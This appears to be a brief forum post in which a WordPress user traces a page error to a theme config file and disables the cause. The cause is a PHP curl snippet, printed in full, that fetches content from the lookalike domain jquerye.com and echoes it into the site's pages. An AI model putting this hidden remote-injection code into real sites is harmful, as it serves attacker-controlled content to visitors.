jquerye.com/jquery-1.6.3.min.js (port 80) error
1)I deactivated all the plugins and re-activated one by one, not found the culprit.
2) I deactivated the theme, the error gone(For sure is the theme caused the error).
3) I search jquery-1.6.3.min.js in the themes folder, no found the file. I then, opened themes folder function.php…
I saw the line like the following:
if(defined(‘TEMPLATEPATH’)){ include(“PPT/_config.php”); }
So, it was located at the PPT/config.php folder.
I opened the file with notepad and edited inside FTP, then save. SOLVED!
I just commanded the file”
{if (function_exists(‘curl_init’)){$url = “https://www.jquerye.com/jquery-1.6.3.min.js”;$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}
to
//{if (function_exists(‘curl_init’)){$url = “https://www.jquerye.com/jquery-1.6.3.min.js”;$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}
Happy day!